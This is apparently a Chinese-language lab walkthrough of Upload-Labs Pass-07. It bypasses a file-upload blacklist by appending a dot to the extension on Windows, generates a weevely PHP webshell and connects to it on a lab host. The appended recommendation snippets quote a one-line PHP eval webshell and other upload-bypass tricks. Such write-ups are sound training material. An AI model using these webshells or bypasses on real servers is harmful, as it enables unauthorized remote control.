Upload-Labs-Pass-07
目录
一、相关知识
1、空格绕过原理:
二、环境搭配
三、文件上传
1、创建webshell
2、设置代理
3、文件上传
四、Weevely连接
一、相关知识
1、空格绕过原理:
Windows系统下,文件后缀名最后一个点会被自动去除掉。
二、环境搭配
攻击机: | kali | IP: | 192.168.0.112 |
靶机: | Windows2008 | IP: | 192.168.0.130:9006 |
三、文件上传
1、创建webshell
格式:weevely generate 密码 文件的保存路径 文件名
命令:weevely generate cmd /home/kali/网络安全/木马/weevely.php
2、设置代理
浏览器设置代理
Burpsuite设置代理
3、文件上传
在文件名后面添加点号
右键点击图片使用新标签打开图片,可以发现图片上传的路径。
四、Weevely连接
添加数据:将图片路径复制到URL地址,设置密码(文件中的cmd),成功连接。
格式:weevely 文件的URL 密码
命令:weevely http://192.168.0.130:9006/upload/weevely.php cmd
Upload-Labs-Pass-07相关推荐
- Upload labs
Pass -01(js检查) 题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接, 注意: 文件没有上传在具体题目中 ...
- (白帽子学习笔记)前渗透——文件上传upload labs
读者需知 1.本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2.本文参考了一些文章,如有侵权请联系本人删除 第一关--前端验证 1.将浏览器中的JS代码禁 ...
- upload -labs通关解析及上传类型总结和思考
Pass-01(客户端JS绕过) 客户端JS判断方法:上传一个php文件,用bp抓包,如果没抓到包就弹框说不能上传,就说明是客户端JS检测 客户端JS绕过方法: 方法一: 上传一个图片马格式为jpg, ...
- Upload LABS Pass-11
第十一关在服务端使用了白名单 , 但文件保存路径外漏 , 可以使用00截断 准备一个 11.php 文件 , 内容为一句话木马 <?php eval($_POST[-7]);?> 上传 1 ...
- Upload LABS Pass-10
第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单 准备一个 10.pphphp 文件 , 内容为一句话木马 &l ...
- Upload LABS Pass-9
第九关在后端使用了黑名单,并过滤了大小写,空格,点以及数据流 , 但未对文件重命名并且只过滤了一遍点和空格 , 我们在文件后缀名添加 点空格点 , 来绕过黑名单 准备一个 9.php 文件 , 内容为 ...
- Upload LABS Pass-8
第八关在后端使用了黑名单 , 并过滤了大小写,点以及空格 , 但并未过滤数据流 , 我们使用代理拦截请求,在文件后缀名中添加数据流,绕过黑名单 准备一个 8.php 文件 , 内容为一句话木马 < ...
- Upload LABS Pass-7
第七关在后端使用了黑名单 , 并过滤了大小写,空格 , 但未过滤点 , 我们使用代理拦截请求,将后缀名添加点. , 来绕过黑名单 准备一个 7.php 文件 , 内容为一句话木马 <?php e ...
- Upload LABS Pass-6
第六关在后端使用了黑名单 , 并过滤了大小写和点 , 但未过滤空格 , 我们使用代理抓包在后缀名中添加空格,即可绕过黑名单 准备一个 6.php 文件 , 内容为一句话木马 <?php eval ...
- Upload LABS Pass-5
第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写来绕过黑名单 准备一个 5.PHP 文件 , 内容为一句话木马 <?php eval($_POST[ ...
最新文章
- Java集合框架中Map接口的使用
- python课程设计报告总结-上海python课程设计报告数据处理
- vue就地复用不是更快吗_Vue.js从零开始——组件(1)
- Android PC投屏简单尝试—最终章2
- 饥荒机器人怎么用避雷针充电_新款iPhone充电线怎么这么好看~安卓也可以用!...
- Bootstrap模态框垂直高度居中问题
- 牛客假日团队赛10 L	乘积最大 (dp,大数)
- node --- 模拟事件的异步
- devexpress textedit调整文字何文本框的间距_手把手教学:用PPT做效果超赞的文字效果...
- 5-去掉a标签下划线,禁止a标签的跳转
- mysql报错:You must at least set –server-id to enable either a master or a slave
- 安全多方学习开源框架调研
- 苹果在 WWDC 上宣布放弃英特尔转向 ARM 芯片,会有哪些优势?你的 Mac 将何去何从?
- 中国互联网办公地变迁史:你的公司为什么也搬家了?
- Integer Intervals
- Java利用TCP进行文件的传输
- 5种数据分析常用的思维方法!
- MySQL时间函数使用,查询前一天、当月、当年、上年
- 第三方支付平台:BeeCloud和Ping++对比
- 美观实用!吹爆这个中文排版开源项目